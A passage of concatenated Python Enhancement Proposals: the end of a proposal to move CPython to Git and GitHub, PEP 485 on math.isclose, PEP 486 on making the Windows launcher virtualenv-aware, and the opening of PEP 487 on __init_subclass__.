writing how to guides, answering questions, and writing articles about Git
which makes it easier for a new user to find answers and information about
the tool they are trying to learn.
Another benefit is that by nature of having a larger community, there will be
more tooling written around it. This increases options for everything from
GUI clients, helper scripts, repository hosting, etc.
Repository Hosting
This PEP proposes allowing GitHub Pull Requests to be submitted, however GitHub
does not have a way to submit Pull Requests against a repository that is not
hosted on GitHub. This PEP also proposes that in addition to GitHub Pull
Requests Phabricator’s Differential app can also be used to submit proposed
changes and Phabricator does allow submitting changes against a repository
that is not hosted on Phabricator.
For this reason this PEP proposes using GitHub as the canonical location of
the repository with a read-only mirror located in Phabricator. If at some point
in the future GitHub is no longer desired, then repository hosting can easily
be moved to solely in Phabricator and the ability to accept GitHub Pull
Requests dropped.
In addition to hosting the repositories on Github, a read only copy of all
repositories will also be mirrored onto the PSF Infrastructure.
Code Review
Currently CPython uses a custom fork of Rietveld which has been modified to
not run on Google App Engine, and which currently only one person is able to
maintain. In addition it is missing features that are
present in many modern code review tools.
This PEP proposes allowing both Github Pull Requests and Phabricator changes
to propose changes and review code. It suggests both so that contributors can
select which tool best enables them to submit changes, and reviewers can focus
on reviewing changes in the tooling they like best.
GitHub Pull Requests
GitHub is a very popular code hosting site and is increasingly becoming the
primary place people look to contribute to a project. Enabling users to
contribute through GitHub is enabling contributors to contribute using tooling
that they are likely already familiar with and if they are not they are likely
to be able to apply to another project.
GitHub Pull Requests have a fairly major advantage over the older “submit a
patch to a bug tracker” model. It allows developers to work completely within
their VCS using standard VCS tooling so it does not require creating a patch
file and figuring out what the right location is to upload it to. This lowers
the barrier for sending a change to be reviewed.
On the reviewing side, GitHub Pull Requests are far easier to review, they have
nice syntax highlighted diffs which can operate in either unified or side by
side views. They allow expanding the context on a diff up to and including the
entire file. Finally they allow commenting inline and on the pull request as
a whole and they present that in a nice unified way which will also hide
comments which no longer apply. Github also provides a “rendered diff” view
which enables easily viewing a diff of rendered markup (such as rst) instead
of needing to review the diff of the raw markup.
The Pull Request work flow also makes it trivial to enable the ability to
pre-test a change before actually merging it. Any particular pull request can
have any number of different types of “commit statuses” applied to it, marking
the commit (and thus the pull request) as either in a pending, successful,
errored, or failure state. This makes it easy to see inline if the pull request
is passing all of the tests, if the contributor has signed a CLA, etc.
Actually merging a Github Pull Request is quite simple, a core reviewer simply
needs to press the “Merge” button once the status of all the checks on the
Pull Request are green for successful.
GitHub also has a good workflow for submitting pull requests to a project
completely through their web interface. This would enable the Python
documentation to have “Edit on GitHub” buttons on every page and people who
discover things like typos, inaccuracies, or just want to make improvements to
the docs they are currently writing can simply hit that button and get an in
browser editor that will let them make changes and submit a pull request all
from the comfort of their browser.
Phabricator
In addition to GitHub Pull Requests this PEP also proposes setting up a
Phabricator instance and pointing it at the GitHub hosted repositories. This
will allow utilizing the Phabricator review applications of Differential and
Audit.
Differential functions similarly to GitHub pull requests except that they
require installing the arc command line tool to upload patches to
Phabricator.
Whether to enable Phabricator for any particular repository can be chosen on
a case-by-case basis, this PEP only proposes that it must be enabled for the
CPython repository, however for smaller repositories such as the PEP repository
it may not be worth the effort.
Criticism
X is not written in Python
One feature that the current tooling (Mercurial, Rietveld) has is that the
primary language of all of the pieces is Python. It is this PEP’s
belief that we should focus on the best tools for the job and not the best
tools that happen to be written in Python. Volunteer time is a precious
resource to any open source project and we can best respect and utilize that
time by focusing on the benefits and downsides of the tools themselves rather
than what language their authors happened to write them in.
One concern is the ability to modify tools to work for us, however one of
the Goals here is to not modify software to work for us and instead adapt
ourselves to a more standard workflow. This standardization pays off in the
ability to re-use tools out of the box freeing up developer time to actually
work on Python itself as well as enabling knowledge sharing between projects.
However, if we do need to modify the tooling, Git itself is largely written in
C the same as CPython itself is. It can also have commands written for it using
any language, including Python. Phabricator is written in PHP which is a fairly
common language in the web world and fairly easy to pick up. GitHub itself is
largely written in Ruby but given that it’s not Open Source there is no ability
to modify it, so its implementation language is completely meaningless.
GitHub is not Free/Open Source
GitHub is a big part of this proposal and someone who tends more to ideology
rather than practicality may be opposed to this PEP on that grounds alone. It
is this PEP’s belief that while using entirely Free/Open Source software is an
attractive idea and a noble goal, that valuing the time of the contributors by
giving them good tooling that is well maintained and that they either already
know or if they learn it they can apply to other projects is a more important
concern than treating Free/Open Source software as a hard
requirement.
However, history has shown us that sometimes benevolent proprietary companies
can stop being benevolent. This is hedged against in a few ways:
We are not utilizing the GitHub Issue Tracker, both because it is not
powerful enough for CPython but also because for the primary CPython
repository the ability to take our issues and put them somewhere else if we
ever need to leave GitHub relies on GitHub continuing to allow API access.
We are utilizing the GitHub Pull Request workflow, however all of those
changes live inside of Git. So a mirror of the GitHub repositories can easily
contain all of those Pull Requests. We would potentially lose any comments if
GitHub suddenly turned “evil”, but the changes themselves would still exist.
We are utilizing the GitHub repository hosting feature, however since this is
just git moving away from GitHub is as simple as pushing the repository to
a different location. Data portability for the repository itself is extremely
high.
We are also utilizing Phabricator to provide an alternative for people who
do not wish to use GitHub. This also acts as a fallback option which will
already be in place if we ever need to stop using GitHub.
Relying on GitHub comes with a number of benefits beyond just the benefits of
the platform itself. Since it is a commercially backed venture it has a full-time
staff responsible for maintaining its services. This includes making sure
they stay up, making sure they stay patched for various security
vulnerabilities, and further improving the software and infrastructure as time
goes on.
Mercurial is better than Git
Whether Mercurial or Git is better on a technical level is a highly subjective
opinion. This PEP does not state whether the mechanics of Git or Mercurial is
better and instead focuses on the network effect that is available for either
option. Since this PEP proposes switching to Git this leaves the people who
prefer Mercurial out, however those users can easily continue to work with
Mercurial by using the hg-git [2] extension for Mercurial which will
let it work with a repository which is Git on the serverside.
CPython Workflow is too Complicated
One sentiment that came out of previous discussions was that the multi branch
model of CPython was too complicated for Github Pull Requests. It is the belief
of this PEP that this statement is not accurate.
Currently any particular change requires manually creating a patch for 2.7 and
3.x, which won’t change at all in this regard.
If someone submits a fix for the current stable branch (currently 3.4) the
GitHub Pull Request workflow can be used to create, in the browser, a Pull
Request to merge the current stable branch into the master branch (assuming
there is no merge conflicts). If there is a merge conflict that would need to
be handled locally. This provides an improvement over the current situation
where the merge must always happen locally.
Finally if someone submits a fix for the current development branch currently
then this has to be manually applied to the stable branch if it desired to
include it there as well. This must also happen locally in the new
workflow, however for minor changes it could easily be accomplished in the
GitHub web editor.
Looking at this, I do not believe that any system can hide the complexities
involved in maintaining several long running branches. The only thing that the
tooling can do is make it as easy as possible to submit changes.
Example: Scientific Python
One of the key ideas behind the move to both git and Github is that a feature
of a DVCS, the repository hosting, and the workflow used is the social network
and size of the community using said tools. We can see this is true by looking
at an example from a sub-community of the Python community: The Scientific
Python community. They have already migrated most of the key pieces of the
SciPy stack onto Github using the Pull Request-based workflow. This process
started with IPython, and as more projects moved over it became a natural
default for new projects in the community.
They claim to have seen a great benefit from this move, in that it enables
casual contributors to easily move between different projects within their
sub-community without having to learn a special, bespoke workflow and a
different toolchain for each project. They’ve found that when people can use
their limited time on actually contributing instead of learning the different
tools and workflows, not only do they contribute more to one project, but
that they also expand out and contribute to other projects. This move has also
been attributed to the increased tendency for members of that community to go
so far as publishing their research and educational materials on Github as
well.
This example showcases the real power behind moving to a highly popular
toolchain and workflow, as each variance introduces yet another hurdle for new
and casual contributors to get past and it makes the time spent learning that
workflow less reusable with other projects.
References
[1]
Open Hub Statistics
[2]
Hg-Git mercurial plugin
Copyright
This document has been placed in the public domain.
PEP 485 – A Function for testing approximate equality
Author:
Christopher Barker <PythonCHB at gmail.com>
Status:
Final
Type:
Standards Track
Created:
20-Jan-2015
Python-Version:
3.5
Post-History:
Resolution:
Python-Dev message
Table of Contents
Abstract
Rationale
Existing Implementations
Proposed Implementation
Handling of non-finite numbers
Non-float types
Behavior near zero
Implementation
Relative Difference
How much difference does it make?
Symmetry
Which symmetric test?
Large Tolerances
Defaults
Relative Tolerance Default
Absolute tolerance default
Expected Uses
Inappropriate uses
Other Approaches
unittest.TestCase.assertAlmostEqual
numpy isclose()
Boost floating-point comparison
Alternate Proposals
A Recipe
zero_tol
No absolute tolerance
Other tests
References
Copyright
Abstract
This PEP proposes the addition of an isclose() function to the standard
library math module that determines whether one value is approximately equal
or “close” to another value.
Rationale
Floating point values have limited precision, which makes them
unable to exactly represent some values and causes errors to
accumulate with repeated computation. As a result, it is common
advice to only use an equality comparison in very specific situations.
Often an inequality comparison fits the bill, but there are times
(often in testing) where the programmer wants to determine whether a
computed value is “close” to an expected value, without requiring them
to be exactly equal. This is common enough, particularly in testing,
and not always obvious how to do it, that it would be a useful addition to
the standard library.
Existing Implementations
The standard library includes the unittest.TestCase.assertAlmostEqual
method, but it:
Is buried in the unittest.TestCase class
Is an assertion, so you can’t use it as a general test at the command
line, etc. (easily)
Is an absolute difference test. Often the measure of difference
requires, particularly for floating point numbers, a relative error,
i.e. “Are these two values within x% of each-other?”, rather than an
absolute error. Particularly when the magnitude of the values is
unknown a priori.
The numpy package has the allclose() and isclose() functions,
but they are only available with numpy.
The statistics package tests include an implementation, used for its
unit tests.
One can also find discussion and sample implementations on Stack
Overflow and other help sites.
Many other non-python systems provide such a test, including the Boost C++
library and the APL language [4].
These existing implementations indicate that this is a common need and
not trivial to write oneself, making it a candidate for the standard
library.
Proposed Implementation
NOTE: this PEP is the result of extended discussions on the
python-ideas list [1].
The new function will go into the math module, and have the following
signature:
isclose(a, b, rel_tol=1e-9, abs_tol=0.0)
a and b: are the two values to be tested for relative closeness
rel_tol: is the relative tolerance – it is the amount of error
allowed, relative to the larger absolute value of a or b. For example,
to set a tolerance of 5%, pass rel_tol=0.05. The default tolerance is 1e-9,
which assures that the two values are the same within about 9 decimal
digits. rel_tol must be greater than 0.0.
abs_tol: is a minimum absolute tolerance level – useful for
comparisons near zero.
Modulo error checking, etc, the function will return the result of:
abs(a-b) <= max( rel_tol * max(abs(a), abs(b)), abs_tol )
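A pure-Python sketch of that test (error checking and handling of NaN and infinities are omitted here):
def is_close(a, b, rel_tol=1e-9, abs_tol=0.0):
    # Direct transcription of the proposed comparison.
    return abs(a - b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol)

print(is_close(1.0, 1.0 + 1e-10))          # True: within the default rel_tol
print(is_close(1e-10, 0.0))                # False: no value is close to zero...
print(is_close(1e-10, 0.0, abs_tol=1e-9))  # ...unless an absolute floor is given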
The name, isclose, is selected for consistency with the existing
isnan and isinf.
Handling of non-finite numbers
The IEEE 754 special values of NaN, inf, and -inf will be handled
according to IEEE rules. Specifically, NaN is not considered close to
any other value, including NaN. inf and -inf are only considered close
to themselves.
Non-float types
The primary use-case is expected to be floating point numbers.
However, users may want to compare other numeric types similarly. In
theory, it should work for any type that supports abs(),
multiplication, comparisons, and subtraction. However, the implementation
in the math module is written in C, and thus can not (easily) use python’s
duck typing. Rather, the values passed into the function will be converted
to the float type before the calculation is performed. Passing in types
(or values) that cannot be converted to floats will raise an appropriate
Exception (TypeError, ValueError, or OverflowError).
The code will be tested to accommodate at least some values of these types:
Decimal
int
Fraction
complex: For complex, a companion function will be added to the
cmath module. In cmath.isclose(), the tolerances are specified
as floats, and the absolute value of the complex values
will be used for scaling and comparison. If a complex tolerance is
passed in, the absolute value will be used as the tolerance.
NOTE: it may make sense to add a Decimal.isclose() that works properly and
completely with the decimal type, but that is not included as part of this PEP.
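For illustration, calls with these types might look as follows (a hedged
sketch, assuming the proposed math.isclose() and its cmath.isclose()
companion are available; results follow the conversion-to-float behavior
described above):
from decimal import Decimal
from fractions import Fraction
from math import isclose
import cmath

isclose(Decimal("1.000000001"), 1.0)         # converted to float, then compared
isclose(Fraction(1, 3), 0.3333333333333333)  # exact float conversion in this case
cmath.isclose(1.0 + 1.0j, 1.0 + 1.000000001j)  # scaled by abs() of the complex values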
Behavior near zero
Relative comparison is problematic if either value is zero. By
definition, no value is small relative to zero. And computationally,
if either value is zero, the difference is the absolute value of the
other value, and the computed absolute tolerance will be rel_tol
times that value. When rel_tol is less than one, the difference will
never be less than the tolerance.
However, while mathematically correct, there are many use cases where
a user will need to know if a computed value is “close” to zero. This
calls for an absolute tolerance test. If the user needs to call this
function inside a loop or comprehension, where some, but not all, of
the expected values may be zero, it is important that both a relative
tolerance and absolute tolerance can be tested for with a single
function with a single set of parameters.
There is a similar issue if the two values to be compared straddle zero:
if a is approximately equal to -b, then a and b will never be computed
as “close”.
To handle this case, an optional parameter, abs_tol, can be
used to set a minimum tolerance that applies when the computed
relative tolerance is very small or zero. That is, the values will
always be considered close if the difference between them is less than
abs_tol.
The default absolute tolerance value is set to zero because there is
no value that is appropriate for the general case. It is impossible to
know an appropriate value without knowing the likely values expected
for a given use case. If all the values tested are on the order of one,
then a value of about 1e-9 might be appropriate, but that would be far
too large if expected values are on the order of 1e-9 or smaller.
Any non-zero default might result in users' tests passing totally
inappropriately. If, on the other hand, a test against zero fails the
first time with defaults, a user will be prompted to select an
appropriate value for the problem at hand in order to get the test to
pass.
NOTE: the author of this PEP has resolved to go back over many of
his tests that use the numpy allclose() function, which provides
a default absolute tolerance, and make sure that the default value is
appropriate.
If the user sets the rel_tol parameter to 0.0, then only the
absolute tolerance will affect the result. While not the goal of the
function, it does allow it to be used as a purely absolute tolerance
check as well.
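A short, hedged example using the proposed function (values chosen only for
illustration) shows why the default of 0.0 forces an explicit choice when
comparing to zero:
isclose(1e-12, 0.0)                  # False: rel_tol * max(|a|, |b|) is tiny
isclose(1e-12, 0.0, abs_tol=1e-9)    # True: the absolute tolerance applies
isclose(1e-12, 0.0, abs_tol=1e-15)   # False: the chosen abs_tol is too small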
Implementation
A sample implementation in Python is available (as of Jan 22, 2015) on
GitHub:
https://github.com/PythonCHB/close_pep/blob/master/is_close.py
This implementation has a flag that lets the user select which
relative tolerance test to apply – this PEP does not suggest that
that be retained, but rather that the weak test be selected.
There are also drafts of this PEP and test code, etc. there:
https://github.com/PythonCHB/close_pep
Relative Difference
There are essentially two ways to think about how close two numbers
are to each other:
Absolute difference: simply abs(a-b)
Relative difference: abs(a-b)/scale_factor [2].
The absolute difference is trivial enough that this proposal focuses
on the relative difference.
Usually, the scale factor is some function of the values under
consideration, for instance:
The absolute value of one of the input values
The maximum absolute value of the two
The minimum absolute value of the two.
The absolute value of the arithmetic mean of the two
These lead to the following possibilities for determining if two
values, a and b, are close to each other.
1. abs(a-b) <= tol*abs(a)
2. abs(a-b) <= tol * max( abs(a), abs(b) )
3. abs(a-b) <= tol * min( abs(a), abs(b) )
4. abs(a-b) <= tol * abs(a + b)/2
NOTE: (2) and (3) can also be written as:
(abs(a-b) <= abs(tol*a)) or (abs(a-b) <= abs(tol*b))
(abs(a-b) <= abs(tol*a)) and (abs(a-b) <= abs(tol*b))
(Boost refers to these as the “weak” and “strong” formulations [3])
These can be a tiny bit more computationally efficient, and thus are
used in the example code.
Each of these formulations can lead to slightly different results.
However, if the tolerance value is small, the differences are quite
small. In fact, often less than available floating point precision.
How much difference does it make?
When selecting a method to determine closeness, one might want to know
how much of a difference it could make to use one test or the other
– i.e. how many values are there (or what range of values) that will
pass one test, but not the other.
The largest difference is between options (2) and (3) where the
allowable absolute difference is scaled by either the larger or
smaller of the values.
Define delta to be the difference between the allowable absolute
tolerance defined by the larger value and that defined by the smaller
value. That is, the amount that the two input values need to be
different in order to get a different result from the two tests.
tol is the relative tolerance value.
Assume that a is the larger value and that both a and b
are positive, to make the analysis a bit easier. delta is
therefore:
delta = tol * (a-b)
or:
delta / tol = (a-b)
The largest absolute difference that would pass the test: (a-b),
equals the tolerance times the larger value:
(a-b) = tol * a
Substituting into the expression for delta:
delta / tol = tol * a
so:
delta = tol**2 * a
For example, for a = 10, b = 9, tol = 0.1 (10%):
maximum tolerance tol * a == 0.1 * 10 == 1.0
minimum tolerance tol * b == 0.1 * 9.0 == 0.9
delta = (1.0 - 0.9) = 0.1, or tol**2 * a = 0.1**2 * 10 = 0.1
The absolute difference between the maximum and minimum tolerance
tests in this case could be substantial. However, the primary use
case for the proposed function is testing the results of computations.
In that case a relative tolerance is likely to be selected of much
smaller magnitude.
For example, a relative tolerance of 1e-8 is about half the
precision available in a Python float. In that case, the difference
between the two tests is 1e-8**2 * a or 1e-16 * a, which is
close to the limit of precision of a Python float. If the relative
tolerance is set to the proposed default of 1e-9 (or smaller), the
difference between the two tests will be lost to the limits of
precision of floating point. That is, each of the four methods will
yield exactly the same results for all values of a and b.
In addition, in common use, tolerances are defined to 1 significant
figure – that is, 1e-9 is specifying about 9 decimal digits of
accuracy. So the difference between the various possible tests is well
below the precision to which the tolerance is specified.
Symmetry
A relative comparison can be either symmetric or non-symmetric. For a
symmetric algorithm:
isclose(a,b) is always the same as isclose(b,a)
If a relative closeness test uses only one of the values (such as (1)
above), then the result is asymmetric, i.e. isclose(a,b) is not
necessarily the same as isclose(b,a).
Which approach is most appropriate depends on what question is being
asked. If the question is: “are these two numbers close to each
other?”, there is no obvious ordering, and a symmetric test is most
appropriate.
However, if the question is: “Is the computed value within x% of this
known value?”, then it is appropriate to scale the tolerance to the
known value, and an asymmetric test is most appropriate.
From the previous section, it is clear that either approach would
yield the same or similar results in the common use cases. In that
case, the goal of this proposal is to provide a function that is least
likely to produce surprising results.
The symmetric approach provides an appealing consistency – it
mirrors the symmetry of equality, and is less likely to confuse
people. A symmetric test also relieves the user of the need to think
about the order in which to set the arguments. It was also pointed
out that there may be some cases where the order of evaluation may not
be well defined, for instance in the case of comparing a set of values
all against each other.
There may be cases when a user does need to know that a value is
within a particular range of a known value. In that case, it is easy
enough to simply write the test directly:
if a-b <= tol*a:
(assuming a > b in this case). There is little need to provide a
function for this particular case.
This proposal uses a symmetric test.
Which symmetric test?
There are three symmetric tests considered:
The case that uses the arithmetic mean of the two values requires that
the values either be added together before dividing by 2, which could
result in extra overflow to inf for very large numbers, or that each
value be divided by two before being added together, which
could result in underflow to zero for very small numbers. This effect
would only occur at the very limit of float values, but it was decided
there was no benefit to the method worth reducing the range of
functionality or adding the complexity of checking values to determine
the order of computation.
This leaves the Boost "weak" test (2), which uses the larger value to
scale the tolerance, and the Boost "strong" test (3), which uses the
smaller of the values to scale the tolerance. For small tolerances
they yield the same result, but this proposal uses the Boost "weak"
test: it is symmetric and provides a more useful result for very
large tolerances.
Large Tolerances
The most common use case is expected to be small tolerances – on order of the
default 1e-9. However, there may be use cases where a user wants to know if two
fairly disparate values are within a particular range of each other: "is a
within 200% (rel_tol = 2.0) of b?" In this case, the strong test would never
indicate that two values are within that range of each other if one of them is
zero. The weak test, however, would use the larger (non-zero) value for the
test, and thus return True if one value is zero. For example: is 0 within 200%
of 10? 200% of ten is 20, so the range within 200% of ten is -10 to +30. Zero
falls within that range, so it will return True.
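A hedged illustration of that difference, using the proposed (weak) test:
isclose(0.0, 10.0, rel_tol=2.0)   # True: 10 <= 2.0 * max(|0.0|, |10.0|)
# A strong test would compute 2.0 * min(|0.0|, |10.0|) == 0.0 and could
# never pass when either value is zero.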
Defaults
Default values are required for the relative and absolute tolerance.
Relative Tolerance Default
The relative tolerance required for two values to be considered
“close” is entirely use-case dependent. Nevertheless, the relative
tolerance needs to be greater than 1e-16 (approximate precision of a
Python float). The value of 1e-9 was selected because it is the
largest relative tolerance for which the various possible methods will
yield the same result, and it is also about half of the precision
available to a Python float. In the general case, a good numerical
algorithm is not expected to lose more than about half of available
digits of accuracy, and if a much larger tolerance is acceptable, the
user should be considering the proper value in that case. Thus 1e-9 is
expected to “just work” for many cases.
Absolute tolerance default
The absolute tolerance value will be used primarily for comparing to
zero. The absolute tolerance required to determine if a value is
“close” to zero is entirely use-case dependent. There is also
essentially no bounds to the useful range – expected values would
conceivably be anywhere within the limits of a Python float. Thus a
default of 0.0 is selected.
If, for a given use case, a user needs to compare to zero, the test
will be guaranteed to fail the first time, and the user can select an
appropriate value.
It was suggested that comparing to zero is, in fact, a common use case
(evidence suggests that the numpy functions are often used with zero).
In this case, it would be desirable to have a "useful" default. Values
around 1e-8 were suggested, being about half of floating point
precision for values of around 1.0.
However, to quote The Zen: “In the face of ambiguity, refuse the
temptation to guess.” Guessing that users will most often be concerned
with values close to 1.0 would lead to spurious passing tests when used
with smaller values – this is potentially more damaging than
requiring the user to thoughtfully select an appropriate value.
Expected Uses
The primary expected use case is various forms of testing – “are the
results computed near what I expect as a result?” This sort of test
may or may not be part of a formal unit testing suite. Such testing
could be used one-off at the command line, in an IPython notebook, as
part of doctests, or as simple asserts in an if __name__ == "__main__"
block.
It would also be an appropriate function to use for the termination
criteria for a simple iterative solution to an implicit function:
guess = something
while True:
    new_guess = implicit_function(guess, *args)
    if isclose(new_guess, guess):
        break
    guess = new_guess
Inappropriate uses
One use case for floating point comparison is testing the accuracy of
a numerical algorithm. However, in this case, the numerical analyst
ideally would be doing careful error propagation analysis, and should
understand exactly what to test for. It is also likely that ULP (Unit
in the Last Place) comparison may be called for. While this function
may prove useful in such situations, it is not intended to be used in
that way without careful consideration.
Other Approaches
unittest.TestCase.assertAlmostEqual
(https://docs.python.org/3/library/unittest.html#unittest.TestCase.assertAlmostEqual)
Tests that values are approximately (or not approximately) equal by
computing the difference, rounding to the given number of decimal
places (default 7), and comparing to zero.
This method is purely an absolute tolerance test, and does not address
the need for a relative tolerance test.
numpy isclose()
http://docs.scipy.org/doc/numpy-dev/reference/generated/numpy.isclose.html
The numpy package provides the vectorized functions isclose() and
allclose(), for similar use cases as this proposal:
isclose(a, b, rtol=1e-05, atol=1e-08, equal_nan=False)
Returns a boolean array where two arrays are element-wise equal
within a tolerance. The tolerance values are positive, typically very
small numbers. The relative difference (rtol * abs(b)) and the absolute
difference atol are added together to compare against the
absolute difference between a and b.
In this approach, the absolute and relative tolerances are added
together, rather than combined with the "or" (max) method used in this
proposal. This is computationally simpler, and if the relative tolerance is larger than
the absolute tolerance, then the addition will have no effect. However,
if the absolute and relative tolerances are of similar magnitude, then
the allowed difference will be about twice as large as expected.
This makes the function harder to understand, with no computational
advantage in this context.
Even more critically, if the values passed in are small compared to
the absolute tolerance, then the relative tolerance will be
completely swamped, perhaps unexpectedly.
This is why, in this proposal, the absolute tolerance defaults to zero
– the user will be required to choose a value appropriate for the
values at hand.
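A hedged side-by-side sketch of the swamping effect (numpy's defaults are
rtol=1e-05 and atol=1e-08; the proposed function defaults to abs_tol=0.0):
import numpy
from math import isclose   # assuming the proposed function is available

numpy.isclose(1e-10, 0.0)  # True: atol=1e-08 swamps the relative test
isclose(1e-10, 0.0)        # False: abs_tol defaults to 0.0, so the user
                           # must opt in to an absolute tolerance near zero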
Boost floating-point comparison
The Boost project ( [3] ) provides a floating point comparison
function. It is a symmetric approach, with both “weak” (larger of the
two relative errors) and “strong” (smaller of the two relative errors)
options. This proposal uses the Boost “weak” approach. There is no
need to complicate the API by providing the option to select different
methods when the results will be similar in most cases, and the user
is unlikely to know which to select in any case.
Alternate Proposals
A Recipe
The primary alternate proposal was to not provide a standard library
function at all, but rather, provide a recipe for users to refer to.
This would have the advantage that the recipe could provide and
explain the various options, and let the user select that which is
most appropriate. However, that would require anyone needing such a
test to, at the very least, copy the function into their code base,
and select the comparison method to use.
zero_tol
One possibility was to provide a zero tolerance parameter, rather than
the absolute tolerance parameter. This would be an absolute tolerance
that would only be applied in the case of one of the arguments being
exactly zero. This would have the advantage of retaining the full
relative tolerance behavior for all non-zero values, while allowing
tests against zero to work. However, it would also result in the
potentially surprising result that a small value could be “close” to
zero, but not “close” to an even smaller value. e.g., 1e-10 is “close”
to zero, but not “close” to 1e-11.
No absolute tolerance
Given the issues with comparing to zero, another possibility would
have been to only provide a relative tolerance, and let comparison to
zero fail. In this case, the user would need to do a simple absolute
test: abs(val) < zero_tol in the case where the comparison involved
zero.
However, this would not allow the same call to be used for a sequence
of values, such as in a loop or comprehension, making the function far
less useful. It is noted that the default abs_tol=0.0 achieves the
same effect if the default is not overridden.
Other tests
The other tests considered are all discussed in the Relative
Difference section above.
References
[1]
Python-ideas list discussion threads:
https://mail.python.org/pipermail/python-ideas/2015-January/030947.html
https://mail.python.org/pipermail/python-ideas/2015-January/031124.html
https://mail.python.org/pipermail/python-ideas/2015-January/031313.html
[2]
Wikipedia page on relative difference:
http://en.wikipedia.org/wiki/Relative_change_and_difference
[3] (1, 2)
Boost project floating-point comparison algorithms:
http://www.boost.org/doc/libs/1_35_0/libs/test/doc/components/test_tools/floating_point_comparison.html
[4]
1976. R. H. Lathwell. APL comparison tolerance. Proceedings of the
eighth international conference on APL, pages 255-258:
http://dl.acm.org/citation.cfm?doid=800114.803685
Copyright
This document has been placed in the public domain.
PEP 486 – Make the Python Launcher aware of virtual environments
Author:
Paul Moore <p.f.moore at gmail.com>
Status:
Final
Type:
Standards Track
Created:
12-Feb-2015
Python-Version:
3.5
Post-History:
12-Feb-2015
Resolution:
Python-Dev message
Table of Contents
Abstract
Rationale
Implementation
Impact on Script Launching
Exclusions
Reference Implementation
References
Copyright
Abstract
The Windows installers for Python include a launcher that locates the
correct Python interpreter to run (see PEP 397). However, the
launcher is not aware of virtual environments (virtualenv [1] or PEP
405 based), and so cannot be used to run commands from the active
virtualenv.
This PEP proposes making the launcher “virtualenv aware”. This means
that when run without specifying an explicit Python interpreter to
use, the launcher will use the currently active virtualenv, if any,
before falling back to the configured default Python.
Rationale
Windows users with multiple copies of Python installed need a means of
selecting which one to use. The Python launcher provides this
facility by means of a py command that can be used to run either a
configured “default” Python or a specific interpreter, by means of
command line arguments. So typical usage would be:
# Run the Python interactive interpreter
py
# Execute an installed module
py -m pip install pytest
py -m pytest
When using virtual environments, the py launcher is unaware that a
virtualenv is active, and will continue to use the system Python. So
different command invocations are needed to run the same commands in a
virtualenv:
# Run the Python interactive interpreter
python
# Execute an installed module (these could use python -m,
# which is longer to type but is a little more similar to the
# launcher approach)
pip install pytest
py.test
Having to use different commands is error-prone, and in many cases
the error is difficult to spot immediately. The PEP proposes making
the py command usable with virtual environments, so that the first
form of command can be used in all cases.
Implementation
Both virtualenv and the core venv module set an environment
variable VIRTUAL_ENV when activating a virtualenv. This PEP
proposes that the launcher checks for the VIRTUAL_ENV environment
variable whenever it would run the “default” Python interpreter for
the system (i.e., when no specific version flags such as py -2.7
are used) and if present, run the Python interpreter for the
virtualenv rather than the default system Python.
The “default” Python interpreter referred to above is (as per PEP 397)
either the latest version of Python installed on the system, or
a version configured via the py.ini configuration file. When the
user specifies an explicit Python version on the command line, this
will always be used (as at present).
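A hedged Python sketch of that decision logic (the real launcher is written
in C; find_python() and configured_default() are hypothetical helpers standing
in for the PEP 397 version lookup):
import os

def interpreter_to_run(requested_version=None):
    # An explicit version on the command line (e.g. "py -2.7") always wins.
    if requested_version is not None:
        return find_python(requested_version)      # hypothetical helper
    # Otherwise an active virtualenv, signalled by VIRTUAL_ENV, is used.
    venv = os.environ.get("VIRTUAL_ENV")
    if venv:
        return os.path.join(venv, "Scripts", "python.exe")
    # Fall back to the configured default (py.ini or latest installed Python).
    return configured_default()                    # hypothetical helper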
Impact on Script Launching
As well as interactive use, the launcher is used as the Windows file
association for Python scripts. In that case, a “shebang” (#!)
line at the start of the script is used to identify the interpreter to
run. A fully-qualified path can be used, or a version-specific Python
(python3 or python2, or even python3.5), or the generic
python, which means to use the default interpreter.
The launcher also looks for the specific shebang line
#!/usr/bin/env python. On Unix, the env program searches for a
command on $PATH and runs the command so located. Similarly, with
this shebang line, the launcher will look for a copy of python.exe
on the user’s current %PATH% and will run that copy.
As activating a virtualenv means that it is added to PATH, no
special handling is needed to run scripts with the active virtualenv -
they just need to use the #!/usr/bin/env python shebang line,
exactly as on Unix. (If there is no activated virtualenv, and no
python.exe on PATH, the launcher will look for a default
Python exactly as if the shebang line had said #!python).
Exclusions
The PEP makes no attempt to promote the use of the launcher for
running Python on Windows. Most existing documentation assumes the
use of python as the command to run Python, and (for example)
pip to run an installed Python command. This documentation is not
expected to change, and users who choose to manage their PATH
environment variable can continue to use this form. The focus of this
PEP is purely on allowing users who prefer to use the launcher when
dealing with their system Python installations, to be able to continue
to do so when using virtual environments.
Reference Implementation
A patch implementing the proposed behaviour is available at
http://bugs.python.org/issue23465
References
[1]
https://virtualenv.pypa.io/
Copyright
This document has been placed in the public domain.
PEP 487 – Simpler customisation of class creation
Author:
Martin Teichmann <lkb.teichmann at gmail.com>
Status:
Final
Type:
Standards Track
Created:
27-Feb-2015
Python-Version:
3.6
Post-History:
27-Feb-2015, 05-Feb-2016, 24-Jun-2016, 02-Jul-2016, 13-Jul-2016
Replaces:
422
Resolution:
Python-Dev message
Table of Contents
Abstract
Background
Proposal
Key Benefits
Easier inheritance of definition time behaviour
Reduced chance of metaclass conflicts
New Ways of Using Classes
Subclass registration
Trait descriptors
Implementation Details
Reference Implementation
Backward compatibility issues
Rejected Design Options
Calling the hook on the class itself
Other variants of calling the hooks
Requiring an explicit decorator on __init_subclass__
A more __new__-like hook
Adding a class attribute with the attribute order
History
Copyright
Abstract
Currently, customising class creation requires the use of a custom metaclass.
This custom metaclass then persists for the entire lifecycle of the class,
creating the potential for spurious metaclass conflicts.
This PEP proposes to instead support a wide range of customisation
scenarios through a new __init_subclass__ hook in the class body,
and a hook to initialize attributes.
The new mechanism should be easier to understand and use than
implementing a custom metaclass, and thus should provide a gentler
introduction to the full power of Python’s metaclass machinery.
Background
Metaclasses are a powerful tool to customize class creation. They have,
however, the problem that there is no automatic way to combine metaclasses.
If one wants to use two metaclasses for a class, a new metaclass combining
those two needs to be created, typically manually.
This need often occurs as a surprise to a user: inheriting from two base
classes coming from two different libraries suddenly raises the necessity
to manually create a combined metaclass, where typically one is not
interested in those details about the libraries at all. This becomes
even worse if one library starts to make use of a metaclass which it
has not done before. While the library itself continues to work perfectly,
suddenly every code combining those classes with classes from another library
fails.
Proposal
While there are many possible ways to use a metaclass, the vast majority
of use cases falls into just three categories: some initialization code
running after class creation, the initialization of descriptors and
keeping the order in which class attributes were defined.
The first two categories can easily be achieved by having simple hooks
